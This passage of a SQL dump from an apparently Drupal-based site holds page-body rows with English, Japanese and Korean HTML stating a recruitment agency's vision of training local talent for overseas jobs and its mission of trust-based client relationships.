Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoListParagraph\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>위해</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 236, 'en', 0, '<img data-entity-uuid=\"41966a19-134b-450b-9bc4-17e138bb169b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_1.jpg\" width=\"29.93%\" data-align=\"left\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 236, 'ja', 0, '<blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。<o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 25, 236, 'ko', 0, '<blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoListParagraph\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>위해</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 237, 'en', 0, '<img data-entity-uuid=\"41966a19-134b-450b-9bc4-17e138bb169b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_1.jpg\" width=\"29.93%\" data-align=\"left\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 237, 'ja', 0, '<img data-entity-uuid=\"660bf351-a3d0-4bc7-9799-6b728a87a97e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_2.jpg\" width=\"21.73%\" data-align=\"left\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。<o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 237, 'ko', 0, '<blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\" 